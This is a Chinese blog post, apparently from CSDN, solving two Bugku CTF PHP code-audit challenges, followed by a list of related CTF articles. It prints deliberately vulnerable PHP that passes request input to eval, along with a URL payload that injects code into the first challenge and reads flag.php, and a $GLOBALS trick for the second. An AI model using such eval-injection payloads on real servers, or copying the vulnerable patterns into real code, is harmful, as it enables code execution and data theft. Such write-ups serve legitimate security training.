php简单代码审计

最新推荐文章于 2024-07-24 17:20:46 发布
最新推荐文章于 2024-07-24 17:20:46 发布
阅读量576 收藏 1
点赞数 2
分类专栏: web 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xianyu9w/article/details/115842063
版权

题目来源 bugku

题目:

<?php 
    include "flag.php"; 
    $a = @$_REQUEST['hello']; 
    eval( "var_dump($a);"); 
    show_source(__FILE__); 
?>

eval能够执行php代码

$_REQUEST: 能获取get/post提交的数据

eval: 把字符串按照 PHP 代码来计算,该字符串必须是合法的 PHP 代码,且必须以分号结尾。

个人猜测应该类似于sql注入
先闭合var_dump:1);

然后构建print_r 打印flag

print_r(file("./flag.php"))

用get方式提交简单 所以构建url为:

http://123.206.87.240:8003/index.php?hello=1);print_r(file("./flag.php")

题目:

flag In the variable ! <?php  

error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){           //判断args参数是否存在
    $args = $_GET['args'];      //参数值赋给$args
    if(!preg_match("/^\w+$/",$args)){     // 如果$args不满足正则表达式   /^开始 \w任意一个单词字符  +表示将前面的字符匹配一次或多次 $/结束    也就是在变量args里寻找符合要求的部分  有返回1  没有返回0
        die("args error!");
    }
    eval("var_dump($$args);");
}
?>

其中包含文件flag1.php
提示通过var获取flag

php中 $GLOBALS存储了所有全局变量 令args=GLOBALS则可得到flag

一泽re.
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
关于PHP代码审计的一些题目
Animation77的博客
09-07 1868
题目一: <?php ////phpinfo(); error_reporting(0); show_source(__file__); preg_replace($_GET["a"], $_GET["b"], $_GET["c"]); ?> 解题思路:先看preg_replace函数定义 这里用到了一个小技巧,用到 /e(有些php版本不支持,我这里是可以的), 这...
php代码审计系列教程,PHP代码审计工具——Rips详细使用教程
weixin_35980011的博客
03-10 935
一、代码审计工具介绍代码审计工具可以辅助我们进行白盒测试,大大提高漏洞分析和代码挖掘的效率。在源代码的静态安全审计中,使用自动化工具辅助人工漏洞挖掘,一款好的代码审计软件,可以显著提高审计工作的效率。学会利用自动化代码审计工具,是每一个代码审计人员必备的能力。代码审计工具按照编程语言、审计原理、运行环境可以有多种分类。商业性的审计软件一般都支持多种编程语言,比如VCG、Fortify SCA,缺点...
php代码逻辑题
kuzemax的博客
07-19 184
我们选中双引号里的hectf 复制左边的hex码,然后2个字符前加一个%。同时最后有一个include可以读取到data里的数组按照读取的形势我们可以判断出这是个二维数组。请注意,此条件中的一些字符似乎是反向的,这可能是一种试图绕过字符串匹配检查的技巧。是一个包含通过HTTP POST方法发送的变量和值的关联数组。的值转换为MD5哈希,并检查前27个字符是否与给定的值匹配。是一个包含通过URL查询字符串发送的变量和值的关联数组。选中中括号里的hectf同理,这就是我们要做的get请求。
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 6120
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
Web 安全 PHP 代码审查之常规漏洞
最新发布
qq_53058639的博客
07-24 759
工欲善其事,必先利其器。我们做代码审计之前选好工具也是十分必要的。下面我给大家介绍两款代码审计中比较好用的工具。功能介绍RIPS 是一款基于 PHP 开发的针对 PHP 代码安全审计的软件。另外,它也是一款开源软件,由国外安全研究员 Johannes Dahse 开发,程序只有 450KB,目前能下载到的最新版是0.55。在写这段文字之前笔者特意读过它的源码,它最大的亮点在于调用了 PHP 内置解析器接口。
CTFshow web入门——爆破
小元砸的博客
01-24 4923
web 21 一.涉及工具: burp suit burp suit 使用教程 二.解题思路: 1.随便输一个密码和用户名抓包一下 2.base64解密一下发现账号密码的形式为 账号:密码,根据题目提示我们用自定义迭代器爆破,使用方法参考:Custom iterator的使用 注:下面爆破用的字典是题目所提供的 3.爆破出结果 web 22 一.涉及知识点: 子域名爆破(此题不能爆破出来)在线子域名爆破 二.解题思路: 直接点开View Hint(提示)即可得到答案 web 23 一.涉及工具: p
ctfshow--RCE极限挑战
bossDDYY的博客
11-20 1699
使用A的话构造GET肯定是无法小于105 那么可以尝试构造POST。phpinfo安装了一个扩展gettext,该扩展支持函数。,我们可以利用反引号执行命令 echo输出。我们跑一下 看看哪些字符没有被过滤。要保证构造payload长度小于。限制字符的自增 对于我来说较难。fuzz测试哪些字符没有被过滤。另外更有大佬的payload。fuzz测试什么没有被过滤。限制传入的参数长度小于等于。fuzz测试,可用字符。构造的payload。
C#实现的简单PHP代码审计程序
08-24
在这个场景中,我们有一个使用C#编写的简单PHP代码审计程序。这个程序的主要目标是对PHP源代码进行检查,查找潜在的安全漏洞、性能瓶颈或其他编程错误。C#是一种强类型、面向对象的语言,它的丰富特性和强大的.NET...
PHP 代码审计神器rips
07-04
**PHP 代码审计神器 RIPS** 在Web开发领域,PHP是一种广泛应用的服务器端脚本语言,但随之而来的安全问题不容忽视。为了确保代码的安全性和稳定性,开发者需要进行代码审计,以便找出潜在的安全漏洞和不良编程实践...
php代码审计简单的CMS,chinaz)
03-04
PHP代码审计】是软件开发过程中的重要环节,特别是对于基于PHP语言的CMS(内容管理系统)而言,确保代码的安全性和稳定性至关重要。`chinaz CMS`是一个简易的PHP内容管理系统,特点是解压后即可直接使用,适合初学...
Seay PHP代码审计工具2.1公测版.rar
05-31
Seay PHP代码审计工具是一个专门用于审核PHP代码安全性的工具,以下是关于该工具的一些关键信息: 功能特性: 源码浏览:允许用户通过文件列表浏览源代码,并可直接查看和分析含有特定关键字的代码。 关键字扫描:...
CTFSHOW WEB入门——爆破
Chur的博客
09-16 1055
WEB入门——爆破 BP
[CTF]CTFSHOW反序列化
Sapphire037的博客
01-20 3791
265 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-04 23:52:24 # @Last Modified by: h1xa # @Last Modified time: 2020-12-05 00:17:08 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); include('flag.php');
ctfshow web入门 php特性
Sentiment的博客
04-11 5405
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
CTFshow web(29-51) 命令执行
qq_37561898的博客
01-21 971
CTF,ctfshow,命令执行
PHP反序列化漏洞总结
u013797594的博客
06-11 2516
PHP反序列化漏洞总结
buuctf刷题
qq_41788704的博客
10-28 1987
buuctf刷题BJDCTF2020 Easy MD5网鼎杯 2020 青龙组 AreUSerialzGYCTF2020 Blacklist强网杯 2019 随便注 BJDCTF2020 Easy MD5 进来就是一个输入框,发包查看返回信息 可以看到SQL语句。这里猜想MD5出来的值会不会可以可以这样利用 select * from ‘admin’ where password=’‘or’1’ 这段PHP代码可以找到MD5出来的值类似于 '‘or’1…’ <?php for ($i = 0;;)
文件包含、文件上传漏洞
CyhDl666的博客
01-28 1671
文章目录文件包含漏洞1.[HCTF 2018]WarmUp2.[ACTF2020 新生赛]Include3.[极客大挑战 2019]Secret File4.[BJDCTF2020]ZJCTF 不过如此 文件包含漏洞 不多说了 直接做题 1.[HCTF 2018]WarmUp F12进入source.php文件 <?php highlight_file(__FILE__); class emmm { public static function che
[NewStarCTF 2023] web题解
热门推荐
rev1ve的博客
10-16 1万+
分析一下,第一个if语句判断条件为上传的password参数的MD5值前六位为c4d038;和反引号去绕过对system函数的过滤,反斜杠绕过flag,tac替换cat命令。(多次尝试,发现回显的位置在5而不是1,开始卡了很久没回显)简单的文件包含,这里过滤了常见的转换过滤器base和rot。打开题目,发现是小游戏(题目跟最近打的SHCTF比较像)我们丢到重放器,发现是页面302状态,并且出现了提示。(这里用XFF不行,我用的是X-Real-IP)打开题目,提示我们传参两个数,然后帮我们计算。
WEB代码审计:二次漏洞深度探索
"本文主要探讨了二次漏洞的概念及其在WEB代码审计中的重要性,通过一个PHP文件删除漏洞的示例来说明二次漏洞的原理。同时,文章深入讲解了WEB应用程序代码审计的重点,包括变量和函数的作用,以及如何寻找和利用漏洞...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值